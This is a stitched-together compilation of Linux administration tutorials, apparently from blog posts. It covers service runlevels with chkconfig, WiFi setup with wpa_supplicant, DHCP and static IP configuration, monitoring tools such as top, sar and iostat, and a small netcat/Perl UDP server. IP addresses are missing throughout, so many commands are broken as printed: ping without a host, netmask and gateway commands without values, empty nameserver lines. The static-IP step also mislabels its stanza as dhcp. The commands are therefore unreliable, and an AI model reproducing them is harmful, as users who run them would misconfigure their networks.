In the future, we will expand significantly on what we learned here, and focus on various helper technologies like supervisord for instance, we will learn how to mount filesystems, work on administration and orchestration, and many other cool things. Docker is a very nice concept, and if used correctly, it can make your virtual world easier and more elegant. The initial few steps are rough, but with some luck, this guide will have provided you with the right dose of karma to get happily and confidently underway. Ping me if you have any requests or desires. Technology related, of course. We’re done.

Easily manage Linux services with chkconfig and sysv-rc-conf utilities

If you want to manage the services in your Linux distribution without manually hacking the scripts in runlevel directories, you may want to use the chkconfig and sysv-rc-conf utilities. chkconfig is used on RedHat-based distros, sysv-rc-conf is for Debian variants.

Follow me.


The utility is included by default with RedHat (and sons) and SUSE. This means that system administration is a simple affair on these distributions. All you have to do is learn the basic chkconfig syntax. The commands must be run as root.

chkconfig --level <levels> <service> <switch>

What do we have here?

--level <levels> defines the runlevels in which you want the particular service switched on or off. The runlevels are listed one next to the other, without spaces, commas or any other delimiter – simply a string of numbers, e.g. 34 signifies runlevels 3 and 4.

<service> is the actual service we want enabled/disabled for the listed runlevels.

<switch> is on/off, meaning enabled/disabled service for the particular runlevels.

Let’s see a practical example:

chkconfig --level 2 sshd off
chkconfig --level 2 sshd on

Here, we turned the SSH service (daemon called sshd) off and back on in runlevel 2. Simple, eh?

And we can also list all services using the --list flag:

chkconfig --list


Let’s see what sysv-rc-conf offers:


Let’s take a look at sysv-rc-conf on Ubuntu.

By default, the utility is not installed. We will install it via Synaptic.


The usage model is practically identical to chkconfig. The only difference is that sysv-rc-conf also has a text-based interface: a simple, table-like screen where you manage services using the Spacebar to toggle their status, with the letter X marking an enabled service.


The other functions are identical, including --list and --level:



One important thing: please note in the example above that I’ve written ssh instead of sshd. This is a mistake, but there was no alert from the system. Indeed, both chkconfig and sysv-rc-conf will silently ignore your attempts to configure non-existent services, so pay attention to possible mistakes!

What do they do?

You may be asking yourselves what these tools do. Well, without getting too technical, I’ll try to portray a simple enough picture.

Using the classic model as an example, Linux works in runlevels – sets of modes somewhat similar to Windows Safe mode with/without command prompt and/or networking. Runlevels define what runs when the system boots. Runlevel 1 is the maintenance mode, also known as single mode, with root access only and a minimal shell. Runlevel 3 is the system level with networking and no GUI. Modern desktop distros usually boot into runlevel 5, which is the full system level, with networking and GUI. And so forth.

Definitions of which services should start in each runlevel are listed under the /etc/rcX.d/ directories, where X signifies the runlevel. Inside these directories, you will find scripts starting with the letter S and a two-digit number, e.g. S04somescript. These are the Start scripts for the relevant services. On startup, they are invoked in order of their numbers, from the lowest to the highest.

There is also a set of Kill scripts, which begin with K and are used to stop the services when the system is being shut down, rebooted or runlevels switched.

What chkconfig and sysv-rc-conf do is merely create or remove these scripts in the relevant directories. Simple and beautiful.
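Conceptually, enabling a service just drops an SNN link into the runlevel directory pointing at the service’s init script, and disabling it removes that link again. Below is a toy sketch of the mechanism; the directory layout and function names are illustrative, not the real tools’ internals (on a real system the scripts live under /etc/init.d, with the rcX.d entries linking back to them).

```shell
# Enable: create an SNN symlink in the runlevel dir pointing at the
# service's init script. Disable: remove any matching Start link.
enable_service() {
  local rcdir="$1" service="$2" seq="$3"
  ln -sf "../init.d/$service" "$rcdir/S$seq$service"
}

disable_service() {
  local rcdir="$1" service="$2"
  rm -f "$rcdir"/S[0-9][0-9]"$service"
}
```

For example, enable_service /etc/rc3.d sshd 55 would create /etc/rc3.d/S55sshd, which is roughly what chkconfig --level 3 sshd on does for you.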

For more details, you may want to read the man pages.


Admining Linux systems is a serious, difficult task. You can do without the tedious, futile tasks like manually configuring scripts for the system services, worrying about spelling mistakes or bad syntax. Let the machine work hard, instead of you.

chkconfig and sysv-rc-conf are a must in the hands of even the most bored system administrator. They can greatly simplify the routine of properly configuring the systems for your environment.

Connect to WiFi Network From Command Line In Linux

How many of you have failed to connect to a WiFi network in Linux? Did you bump into issues like the following in various forums, discussion pages and blogs? I am sure everyone did at some point. The following list shows just the results from page 1 of a Google search for “Unable to connect to WiFi network in Linux”.

  1. Cannot connect to wifi at home after upgrade to ubuntu 14.04
  2. Arch Linux not connecting to Wifi anymore
  3. I can’t connect to my wifi
  4. Cannot connect to WiFi
  5. Ubuntu 13.04 can detect wi-fi but can’t connect
  6. Unable to connect to wireless network ath9k
  7. Crazy! I can see wireless network but can’t connect
  8. Unable to connect to Wifi Access point in Debian 7
  9. Unable to connect Wireless

The following guide explains how you can connect to a WiFi network in Linux from the command line. It will take you through the steps for connecting to a WPA/WPA2 WiFi network.


  • WiFi network from command line – Required tools
  • Linux WPA/WPA2/IEEE 802.1X Supplicant
    • iw – Linux Wireless
    • ip – ip program in Linux
    • ping
  • Step 1: Find available WiFi adapters – WiFi network from command line
  • Step 2: Check device status – WiFi network from command line
  • Step 3: Bring up the WiFi interface – WiFi network from command line
  • Step 4: Check the connection status – WiFi network from command line
  • Step 5: Scan to find WiFi Network – WiFi network from command line
  • Step 6: Generate a wpa/wpa2 configuration file – WiFi network from command line
  • Step 7: Connect to WPA/WPA2 WiFi network – WiFi network from command line
  • Step 8: Get an IP using dhclient – WiFi network from command line
  • Step 9: Test connectivity – WiFi network from command line
  • Conclusion

WiFi network from command line – Required tools

The following tools are required to connect to a WiFi network in Linux from the command line:

  1. wpa_supplicant
  2. iw
  3. ip
  4. ping

Before we jump into technical jargon, let’s quickly go over each item, one at a time.

Linux WPA/WPA2/IEEE 802.1X Supplicant

wpa_supplicant is a WPA Supplicant for Linux, BSD, Mac OS X, and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). It is suitable for both desktop/laptop computers and embedded systems. Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver.

iw – Linux Wireless

iw is a new nl80211-based CLI configuration utility for wireless devices. It supports all the new drivers that have been added to the kernel recently. The old tool, iwconfig, which uses the Wireless Extensions interface, is deprecated, and it is strongly recommended to switch to iw and nl80211.

ip – ip program in Linux

ip is used to show and manipulate routing, devices, policy routing and tunnels. It is used for enabling/disabling devices and helps you find general networking information. ip was written by Alexey N. Kuznetsov and added in Linux 2.2. Use man ip to see the full man page.


ping

Good old ping. For every ping, there shall be a pong… ping-pong, ping-pong, ping-pong… that should explain it.

BTW man ping helps too …

Step 1: Find available WiFi adapters – WiFi network from command line

This actually helps: you need to know your WiFi device name before you go and connect to a WiFi network. Just use the following command, which will list all the connected WiFi adapters in your Linux machine.

root@kali:~# iw dev
phy#1
    Interface wlan0
        ifindex 4
        type managed

Let me explain the output:

This system has one physical WiFi adapter.

  1. Designated name: phy#1
  2. Device name: wlan0
  3. Interface Index: 4. Usually as per connected ports (which can be a USB port).
  4. Type: Managed. Type specifies the operational mode of the wireless device. managed means the device is a WiFi station or client that connects to an access point.


Step 2: Check device status – WiFi network from command line

By this time many of you are thinking: why two network devices? The reason I am using two is that I would like to show how a connected and a disconnected device look side by side. The next command will show you exactly that.

You can check whether the wireless device is up or not using the following command:

root@kali:~# ip link show wlan0
4: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc mq state DOWN mode DORMANT qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff

As you can already see, the interface (wlan0) is in state DOWN.

Look for the word “UP” inside the brackets in the first line of the output.


In the above example, wlan0 is not UP, so the next step is to bring it up.

Step 3: Bring up the WiFi interface – WiFi network from command line

Use the following command to bring up the WiFi interface:

root@kali:~# ip link set wlan0 up

Note: If you’re using Ubuntu, Linux Mint, CentOS, Fedora etc. use the command with ‘sudo’ prefix


If you run the show link command again, you can tell that wlan0 is now UP.

root@kali:~# ip link show wlan0
4: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP mode DORMANT qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff

Step 4: Check the connection status – WiFi network from command line

You can check the WiFi network connection status from the command line using the following command:

root@kali:~# iw wlan0 link
Not connected.


The above output shows that you are not connected to any network.

Step 5: Scan to find WiFi Network – WiFi network from command line

Scan to find out what WiFi network(s) are detected

root@kali:~# iw wlan0 scan
BSS 9c:97:26:de:12:37 (on wlan0)
    TSF: 5311608514951 usec (61d, 11:26:48)
    freq: 2462
    beacon interval: 100
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -53.00 dBm 
    last seen: 104 ms ago
    Information elements from Probe Response frame:
    SSID: blackMOREOps
    Supported rates: 1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 
    DS Parameter set: channel 11
    ERP: Barker_Preamble_Mode
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
         * Capabilities: 16-PTKSA-RC (0x000c)
    Extended supported rates: 6.0 9.0 12.0 48.0 
---- truncated ----

The two important pieces of information above are the SSID and the security protocol (WPA/WPA2 vs WEP). The SSID in this example is blackMOREOps. The security protocol is RSN, also commonly referred to as WPA2. The security protocol is important, because it determines what tool you use to connect to the network.
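Since a full iw scan dump can be long, it helps to filter it down to just the network names and security hints. The helper below is a sketch that works on a saved scan dump (e.g. iw wlan0 scan > scan.txt), matching the indented SSID/RSN/WPA lines in the output format shown above; the function name is ours.

```shell
# List the SSID and security-protocol lines from a saved iw scan dump.
list_networks() {
  grep -E '^[[:space:]]*(SSID|RSN|WPA):' "$1" | sed 's/^[[:space:]]*//'
}
```

An RSN line after an SSID tells you the network is WPA2 and that wpa_supplicant is the right tool for the job.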


Step 6: Generate a wpa/wpa2 configuration file – WiFi network from command line

Now we will generate a configuration file for wpa_supplicant that contains the pre-shared key (“passphrase“) for the WiFi network.

root@kali:~# wpa_passphrase blackMOREOps abcd1234 >> /etc/wpa_supplicant.conf
(where 'abcd1234' was the Network password)

wpa_passphrase takes the SSID as its first argument; when the passphrase is not given on the command line, it is read from standard input, which means you need to type in the passphrase for the WiFi network blackMOREOps after you run the command.


Note: If you’re using Ubuntu, Linux Mint, CentOS, Fedora etc. use the command with ‘sudo’ prefix

wpa_passphrase will create the necessary configuration entries based on your input. Each new network will be added as a new entry (it won't replace existing ones) in the configuration file /etc/wpa_supplicant.conf.

root@kali:~# cat /etc/wpa_supplicant.conf 
# reading passphrase from stdin
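The rest of the file was trimmed above; a generated entry normally looks like the following. The hexadecimal psk is derived from the SSID and passphrase, so yours will differ (the value below is a placeholder):

```
# reading passphrase from stdin
network={
	ssid="blackMOREOps"
	#psk="abcd1234"
	psk=<64 hex characters derived from the passphrase>
}
```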

Step 7: Connect to WPA/WPA2 WiFi network – WiFi network from command line

Now that we have the configuration file, we can use it to connect to the WiFi network. We will be using wpa_supplicant to connect. Use the following command:

root@kali:~# wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant.conf
ioctl[SIOCSIWENCODEEXT]: Invalid argument 
ioctl[SIOCSIWENCODEEXT]: Invalid argument 


  • -B means run wpa_supplicant in the background.
  • -D specifies the wireless driver. wext is the generic driver.
  • -i specifies the network interface (wlan0).
  • -c specifies the path for the configuration file.


Use the iw command to verify that you are indeed connected to the SSID.

root@kali:~# iw wlan0 link
Connected to 9c:97:00:aa:11:33 (on wlan0)
    SSID: blackMOREOps
    freq: 2412
    RX: 26951 bytes (265 packets)
    TX: 1400 bytes (14 packets)
    signal: -51 dBm
    tx bitrate: 6.5 MBit/s MCS 0

    bss flags:    short-slot-time
    dtim period:    0
    beacon int:    100

Step 8: Get an IP using dhclient – WiFi network from command line

Up to step 7, we've spent our time connecting to the WiFi network. Now use dhclient to get an IP address via DHCP:

root@kali:~# dhclient wlan0
Reloading /etc/samba/smb.conf: smbd only.

You can use the ip or ifconfig command to verify the IP address assigned by DHCP.

root@kali:~# ip addr show wlan0
4: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff
    inet brd scope global wlan0
       valid_lft forever preferred_lft forever
    inet6 fe80::260:64ff:fe37:4a30/64 scope link 
       valid_lft forever preferred_lft forever


root@kali:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:60:64:37:4a:30 
 inet addr: Bcast: Mask:
 inet6 addr: fe80::260:64ff:fe37:4a30/64 Scope:Link
 RX packets:23868 errors:0 dropped:0 overruns:0 frame:0
 TX packets:23502 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000 
 RX bytes:22999066 (21.9 MiB) TX bytes:5776947 (5.5 MiB)


The last configuration step is to make sure that you have the proper routing rules; add a default routing rule if one is missing.

root@kali:~# ip route show 
default via dev wlan0
dev wlan0  proto kernel  scope link  src


Step 9: Test connectivity – WiFi network from command line

Ping Google's IP to confirm the network connection (or you can just browse the web).

root@kali:~# ping
PING ( 56(84) bytes of data.
64 bytes from icmp_req=3 ttl=42 time=265 ms
64 bytes from icmp_req=4 ttl=42 time=176 ms
64 bytes from icmp_req=5 ttl=42 time=174 ms
64 bytes from icmp_req=6 ttl=42 time=174 ms
--- ping statistics ---
6 packets transmitted, 4 received, 33% packet loss, time 5020ms
rtt min/avg/max/mdev = 174.353/197.683/265.456/39.134 ms


This is a very detailed and long guide, so here is a short summary of everything you need to do, in just a few lines.

root@kali:~# iw dev
root@kali:~# ip link set wlan0 up
root@kali:~# iw wlan0 scan
root@kali:~# wpa_passphrase blackMOREOps abcd1234 >> /etc/wpa_supplicant.conf
root@kali:~# wpa_supplicant -i wlan0 -c /etc/wpa_supplicant.conf
root@kali:~# iw wlan0 link
root@kali:~# dhclient wlan0
root@kali:~# ping
(Where wlan0 is wifi adapter and blackMOREOps is SSID)
(Add Routing manually)
root@kali:~# ip route add default via dev wlan0

At the end of it, you should be able to connect to WiFi network. Depending on the Linux distro you are using and how things go, your commands might be slightly different. Edit commands as required to meet your needs.

Setup DHCP Or Static IP Address From Command Line In Linux

Did you ever have trouble with Network Manager and feel that you need to set up DHCP or a static IP address from the command line in Linux? I once accidentally removed Gnome (my bad, wasn't paying attention and did an apt-get autoremove -y .. how bad is that..). So I was stuck; I couldn't connect to the Internet to reinstall my Gnome Network Manager because I was in text mode and network-manager was broken. I learned a good lesson: you need the Internet for almost anything these days, unless you've memorized all those manual commands.

This guide will show you how to set up DHCP or a static IP address from the command line in Linux. It saved me when I was in trouble; hopefully you will find it useful as well.

Note that my network interface is eth0 for this whole guide. Change eth0 to match your network interface.

Static assignment of IP addresses is typically used to eliminate the network traffic associated with DHCP/DNS and to lock an element in the address space to provide a consistent IP target.

Step 1 : STOP and START Networking service

Some people would argue that a restart would work, but I prefer STOP-START to do a complete rehash. Besides, if it's not working already, why bother with a restart?

# /etc/init.d/networking stop
 [ ok ] Deconfiguring network interfaces...done.
 # /etc/init.d/networking start
 [ ok ] Configuring network interfaces...done.

Step 2 : STOP and START Network-Manager

If you have some other network manager (e.g. wicd), stop and start that one instead.

# /etc/init.d/network-manager stop
 [ ok ] Stopping network connection manager: NetworkManager.
 # /etc/init.d/network-manager start
 [ ok ] Starting network connection manager: NetworkManager.

Just for the kicks, following is what restart would do:

 # /etc/init.d/network-manager restart
 [ ok ] Stopping network connection manager: NetworkManager.
 [ ok ] Starting network connection manager: NetworkManager.

Step 3 : Bring up network Interface

Now that we've restarted both networking and network-manager services, we can bring our interface eth0 up. For some, it will already be up, but without an IP address it's useless at this point. Either way, we are going to fix that in the next few steps.

# ifconfig eth0 up 
# ifup eth0

The next command shows the status of the interface. As you can see, it doesn't have any IP address assigned to it yet.

 # ifconfig eth0
 eth0      Link encap:Ethernet  HWaddr aa:bb:cc:11:22:33
 RX packets:0 errors:0 dropped:0 overruns:0 frame:0
 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Setup DHCP or static IP address from command Line in Linux - blackMORE Ops - 6

Step 4 : Setting up IP address – DHCP or Static?

Now we have two options: we can set up DHCP or a static IP address from the command line. If you decide to use DHCP, ensure your router is capable of serving DHCP. If you think DHCP was the problem all along, then go for static.

Again, if you're using a static IP address, you might want to investigate what range is supported on the network you are connecting to (different networks use different private address ranges). For some readers this might be a trial-and-error method, but it always works.

Step 4.1 – Setup DHCP from command Line in Linux

Assuming that you’ve already completed step 1,2 and 3, you can just use this simple command

The first command appends a line to the /etc/network/interfaces file, telling the eth0 interface to use DHCP.

# echo "iface eth0 inet dhcp" >> /etc/network/interfaces

The next command brings up the interface.

# ifconfig eth0 up 
# ifup eth0

With DHCP, you get the IP address, subnet mask, broadcast address, gateway IP and DNS addresses automatically. Go to Step 4.4 to test your internet connection.

Step 4.2 – Setup static IP, subnet mask, broadcast address in Linux

Use the following commands to set the IP address, subnet mask and broadcast address in Linux. You will be able to find suitable values from another device connected to the network, or directly from the router or gateway's status page.

 # ifconfig eth0
 # ifconfig eth0 netmask
 # ifconfig eth0 broadcast

The next command shows the IP address and details that we've set manually.

# ifconfig eth0
 eth0     Link encap:Ethernet  HWaddr aa:bb:cc:11:22:33
 inet addr:  Bcast:  Mask:
 RX packets:19325 errors:0 dropped:0 overruns:0 frame:0
 TX packets:19641 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Because we are doing everything manually, we also need to setup the Gateway address for the interface. Use the following command to add default Gateway route to eth0.

# route add default gw eth0

We can confirm it using the following command:

# route -n
 Kernel IP routing table
 Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
                                                 UG    0      0        0 eth0
                                                 U     0      0        0 eth0

Step 4.3 – Alternative way of setting Static IP in a DHCP network

If you're connected to a network where DHCP is enabled but you want to assign a static IP to your interface, you can use the following command to set a static IP, netmask and gateway.

# echo -e "iface eth0 inet dhcp\n address\n netmask\n gateway" >> /etc/network/interfaces

At this point if your network interface is not up already, you can bring it up.

# ifconfig eth0 up 
# ifup eth0
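For comparison, the conventional way to express a static configuration in /etc/network/interfaces is a stanza like the following; the addresses are placeholders you must replace with values from your own network:

```
auto eth0
iface eth0 inet static
    address
    netmask
    gateway
```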

Step 4.4 –  Fix missing default Gateway

Looks good to me so far. We’re almost there.

Try to ping Google (because if Google is down, the Internet is broken!):

# ping
 PING ( 56(84) bytes of data.
 64 bytes from ( icmp_req=1 ttl=49 time=520 ms
 64 bytes from ( icmp_req=2 ttl=49 time=318 ms
 64 bytes from ( icmp_req=3 ttl=49 time=358 ms
 64 bytes from ( icmp_req=4 ttl=49 time=315 ms
 --- ping statistics ---
 4 packets transmitted, 4 received, 0% packet loss, time 3002ms
 rtt min/avg/max/mdev = 315.863/378.359/520.263/83.643 ms

It worked!

Step 5 : Setting up nameserver / DNS

For most users, step 4.4 would be the last step. But in case you get a DNS error and want to assign DNS servers manually, use the following command:

# echo -e "nameserver\nnameserver" >> /etc/resolv.conf

This will add Google Public DNS servers to your resolv.conf file. Now you should be able to ping or browse to any website.


Losing your internet connection these days is just painful, because we are so dependent on the Internet to find usable information. It gets frustrating when you suddenly lose your GUI and/or your Network Manager, and all you've got is either an Ethernet port or a wireless card to connect to the internet. That is when you need to have these steps memorized.

I've tried to make this guide as generic as I can, but if you have a suggestion or if I've made a mistake, feel free to comment. Thanks for reading. Please share & RT.

Linux hacks you probably did not know about

This article is a compilation of several interesting, unique command-line tricks that should help you squeeze more juice out of your system, improve your situational awareness of what goes on behind the curtains of the desktop, plus some rather unorthodox solutions that will melt the proverbial socks off your kernel.

Follow me for a round of creative administrative hacking.

1. Run top in batch mode

top is a handy utility for monitoring the utilization of your system. It is invoked from the command line and it works by displaying lots of useful information, including CPU and memory usage, the number of running processes, load, the top resource hitters, and other useful bits. By default, top refreshes its report every 3 seconds.


Most of us use top in this fashion: we run it inside the terminal, look at the statistics for a few seconds and then graciously quit and continue our work.

But what if you wanted to monitor the usage of your system resources unattended? In other words, let some system administration utility run and collect system information and write it to a log file every once in a while. Better yet, what if you wanted to run such a utility only for a given period of time, again without any user interaction?

There are many possible answers:

  • You could schedule a job via cron.
  • You could run a shell script that runs ps every X seconds or so in a loop, incrementing a counter until the desired number of iterations has elapsed. But you would also need uptime to check the load and several other commands to monitor disk utilization and whatnot.

Instead of going wild about trying to patch a script, there’s a much, much simpler solution: top in batch mode.

top can be run non-interactively, in batch mode. Time delay and the number of iterations can be configured, giving you the ability to dictate the data collection as you see fit. Here’s an example:

top -b -d 10 -n 3 >> top-file

We have top running in batch mode (-b). It’s going to refresh every 10 seconds, as specified by the delay (-d) flag, for a total count of 3 iterations (-n). The output will be sent to a file. A few screenshots:

Batch mode 1

Batch mode 2

And that does the trick. Speaking of writing to files …

2. Write to more than one file at once with tee

In general, with static data, this is not a problem. You simply repeat the write operation. With dynamic data, again, this is not that much of a problem. You capture the output into a temporary variable and then write it to a number of files. But there’s an easier and faster way of doing it, without redirection and repetitive write operations. The answer: tee.

tee is a very useful utility that duplicates pipe content. Now, what makes tee really useful is that it can append data to existing files, making it ideal for writing periodic log information to multiple files at once.

Here’s a great example:

ps | tee file1 file2 file3

That’s it! We’re sending the output of the ps command to three different files! Or as many as we want. As you can see in the screenshots below, all three files were created at the same time and they all contain the same data. This is extremely useful for constantly changing output, which you must preserve in multiple instances without typing the same commands over and over like a keyboard-loving monkey.

tee 1

tee 2

tee 3

Now, if you wanted to append data to files, that is periodically update them, you would use the -a flag, like this:

ps | tee -a file1 file2 file3 file4
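To see both behaviors with predictable output, you can substitute echo for ps (a quick sketch):

```shell
# Write one line to three files at once, then append a second line to each.
echo "snapshot 1" | tee file1 file2 file3 > /dev/null
echo "snapshot 2" | tee -a file1 file2 file3 > /dev/null

# Every file now contains both lines.
cat file1
```

All three files end up identical, written in a single pass per command.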

3. Unleash the accounting power with pacct

Did you know that you can log the completion of every single process running on your machine? You may even want to do this, for security, statistical purposes, load optimization, or any other administrative reason you may think of. By default, process accounting (pacct) may not be activated on your machine. You might have to start it:

/usr/sbin/accton /var/account/pacct

Once this is done, every single process will be logged. You can find the logs under /var/account. The log itself is in binary form, so you will have to use a dumping utility to convert it to human-readable form. To this end, you use the dump-acct utility.

dump-acct /var/account/pacct

The output may be very long, depending on the activity on your machine and whether you rotate the logs, which you should, since the accounting logs can inflate very quickly.


And there you go: the list of all processes run on our host since the moment we activated accounting. The output is printed in nice columns and includes the following, from left to right: process name, user time, system time, effective time, UID, GID, memory, and date.

/etc/init.d/psacct start


/etc/init.d/acct start

In fact, starting accounting using the init script is the preferred way of doing things. However, you should note that accounting is not a service in the typical form. The init script does not look for a running process – it merely checks for the lock file under /var. Therefore, if you turn the accounting on/off using the accton command, the init scripts won’t be aware of this and may report false results.

BTW, turning accounting off with accton is done just like that:

accton
When no file is specified, the accounting is turned off. When the command is run against a file, as we’ve demonstrated earlier, the accounting process is started. You should be careful when activating/deactivating the accounting and stick to one method of management, either via the accton command or using the init scripts.

4. Dump utmp and wtmp logs

Like pacct, you can also dump the contents of the utmp and wtmp files. Both these files provide login records for the host. This information may be critical, especially if applications rely on the proper output of these files to function.

Being able to analyze the records gives you the power to examine your systems in and out. Furthermore, it may help you diagnose problems with logins, for example, via VNC or ssh, non-console and console login attempts, and more.

You can dump the logs using the dump-utmp utility. There is no dump-wtmp utility; the former works for both.

Dump utmp

You can also do the following:

dump-utmp /var/log/wtmp

Here’s what the sample file looks like:

utmp log

5. Monitor CPU and disk usage with iostat

Would you like to know how your hard disks behave? Or how well does your CPU churn? iostat is a utility that reports statistics for CPU and I/O devices on your system. It can help you identify bottlenecks and mis-tuned kernel parameters, allowing you to boost the performance of your machine.

On some systems, the utility will be installed by default. Ubuntu 9.04, for example, requires that you install the sysstat package, which, by the way, contains several more goodies that we will soon review:

Install sysstat

Then, we can start monitoring the performance. I will not go into detail about what each little bit of displayed information means, but I will focus on one item: the first output reported by the utility is the average statistics since the last reboot.

Here’s a sample run of iostat:

iostat -x 10 10

The utility runs 10 times, every 10 seconds, reporting extended (-x) statistics. Here’s what the sample output to terminal looks like:

iostat example

6. Monitor memory usage with vmstat

vmstat does a similar job, except it works with virtual memory statistics. For Windows users: the term virtual here does not refer to the pagefile, i.e. swap. It refers to the logical abstraction of memory in the kernel, which is then translated into physical addresses.

vmstat reports information about processes, memory, paging, block IO, traps, and CPU activity. Again, it is very handy for detecting problems with system performance. Here’s a sample run of vmstat:

vmstat 1 10

The utility runs 10 times, reporting every 1 second. For example, we can see that our system has taken some swap, but it's not doing much with it; there's approx. 35MB of free memory and very little I/O activity, as there are no blocked processes. The CPU utilization spikes from just a few percent to almost 90% before calming down.

Nothing specially exciting, but in critical situations, this kind of information can be critical.

vmstat example

7. Combine the power of iostat and vmstat with dstat

dstat aims to replace vmstat, iostat and ifstat combined. It also offers exporting data into .csv files that can then be analyzed using spreadsheet software. dstat uses a pleasant color output in the terminal:


Plus you can make really nice graphs. The spike in the graph comes from opening the Firefox browser, for instance.



8. Collect, report or save system activity information with sar

sar is another powerful, versatile system monitoring tool. It is a sort of jack of all trades when it comes to monitoring and logging system activity. sar can be very useful when trying to analyze strange system problems where normal logs like boot.msg, messages or secure under /var/log do not yield much information. sar writes daily statistics into log files under /var/log/sa. Like we did before, we can monitor CPU utilization, every 2 seconds, 10 times:

sar -u 2 10

CPU example

Or you may want to monitor disk activity (10 iterations, every 5 seconds):

sar -d 5 10

Disk example

Now for some really cool stuff …

9. Create UDP server-client – version 1

Here’s something radical: create a small UDP server that listens on a port. Then configure a client to send information to the server. All this without root access!

Configure server with netcat

netcat is an incredibly powerful utility that can do just about anything with TCP or UDP connections. It can open connections, listen on ports, scan ports, and much more, all this with both IPv4 and IPv6.

In our example, we will use it to create a small UDP server on one of the non-service ports. This means we won’t need root access to get it going.

netcat -l -u -p 42000

Here’s what we did:

-l tells netcat to listen, -u tells it to use UDP, -p specifies the port (42000).

Netcat idle

We can indeed verify with netstat:

netstat -tulpen | grep 42000

And we have an open port:


Configure client

Now we need to configure the client. The big question is how to tell our process to send data to a remote machine, to a UDP port? The answer is quite simple: open a file descriptor that points to the remote server. Here’s the actual BASH script that we will use to test our connection:

Client script

The most interesting bit is the line that starts with exec.

exec 104<> /dev/udp/$1

We created a file descriptor 104 that points to our server. Now, it is possible that the file descriptor number 104 might already be in use, so you may want to check first with lsof or randomize the choice of the descriptor. Furthermore, if you have a name resolution mechanism in place, you can use a hostname instead of an IP. If you wanted to use a TCP connection, you would use /dev/tcp.

The choice of the port is defined by the $1 variable, passed as a command-line argument. You can hard code it – or make everything configurable by the user at runtime. The rest of the code is unimportant; we do something and then send information to our file descriptor, without really caring what it is. Again, we need no root access to do this.

Test connection

Now, we can see the server-client connection in action. Our server is a Ubuntu 8.10 machine, while our client is a Fedora 11. We ran the script on the client:

Script running

And watch the command-line on the server:

Server working

To make it even more exciting, I’ve created a small Flash demo with Wink. You are welcome to play the file, if you’re interested:

Cool, eh?

10. Configure UDP server-client – version 2

The limitation of the exercise above is that we have no control over some of the finer aspects of our connection. Furthermore, the connection is limited to a single endpoint: if one client connects, others will be refused. To make things more exciting, we can improve our server. Instead of using netcat, we will write our own – in Perl.

Perl is a powerful programming language, very flexible, very neat. I must admit I have only recently begun dabbling in it, so do not expect any miracles, but here's one way of creating a UDP server in Perl. There are tons of other implementations available: better, smarter, faster, and more elegant.

The code is very simple. First, let’s take a look at the entire file and then examine sections of code. Here it is:


#!/usr/bin/perl

use IO::Socket;

$server = IO::Socket::INET->new(LocalPort => '50060',
                                Proto     => 'udp')
    or die "Could not create UDP server on port 50060 : $@\n";

my $datagram;
my $MAXSIZE = 16384; # buffer size

while (my $data = $server->recv($datagram, $MAXSIZE)) {
    print $datagram;

    my $logdate = `date +"%m-%d-%H:%M:%S"`;
    chomp $logdate;

    my $filename = "file.$logdate";
    open(FD, '>>', $filename) or die "Could not open $filename : $!\n";
    print FD $datagram;
    close(FD);
}

The code begins with the standard Perl declaration. If you want extra debugging, you can add the -w flag. If you want to use strict code, then you may also want to add use strict; declaration. I warmly recommend this.

The next important bit is this one:

use IO::Socket;

This one tells Perl to use the IO::Socket object interface. You can also use IO::Socket::INET specifically for Internet domain sockets. For more information, please check the official Perl documentation.

The next bit is the creation of the socket, i.e. server:

$server = IO::Socket::INET->new(LocalPort => '50060',
                                Proto     => 'udp')
    or die "Could not create UDP server on port 50060 : $@\n";

We are trying to open the local UDP port 50060. If this cannot be done, the script will die with a rather descriptive message.

Next, we define a variable that will take incoming data (datagram) and the buffer size. The buffer size might be limited by the network implementation or network restrictions on your router/switch or the kernel itself, so some values might not work for you.

And then, we have the server doing some hard work. It prints the data to the screen. But it also creates a log file with a time stamp and prints the data to the file as well.

The beauty of this implementation is that the server permits multiple incoming connections. Of course, you will have to decide how you want to differentiate the data sent by different clients, whether by a message header or by using additional IO::Socket::INET fields like PeerAddr.

On the client side, nothing changes.


That’s it for now. This crazy collection should help you impress your boyfriends and girlfriends, evoke a smile with your peers or even your boss and help you be more detailed and productive when it comes to system administration tasks. Some of the utilities and tricks presented here are tremendously useful.

If you’re wondering what distribution you may need to be running to get these things done, don’t worry. You can get them working on all distros. Throughout this document, I demonstrated using Ubuntu 8.10, Ubuntu 9.04 and Fedora 11. Debian-based or RedHat-based, there’s something for everyone.

In the next article, we will also talk about other crazy hacks and tips, including a very, very useful utility called sec – Simple Event Correlator. That's just a brain teaser for now. I hope you enjoyed this article. See you around.

Hello there, dear readers. Time for the second article of highly useful, cool and fun utilities, commands, and tricks that should help you gain better productivity and understand your system better. In the first part, we learned about a whole bunch of great things, including top in batch mode, how to read process account logs, how to measure system activity with a range of programs, and how to write a simple UDP server-client.

Now, let's see a few more tricks that will help you master a higher, cooler level of Linux knowledge and allow you to impress your significant others, including your boss.

1. Sparse files

What they be, you're askin'. Well, sparse files are normal files – except that blocks containing only zeros are not actually written out. In other words, empty space inside sparse files is merely recorded, without taking any physical space. This is in contrast to regular files, where everything is preallocated, including bits that hold no data.

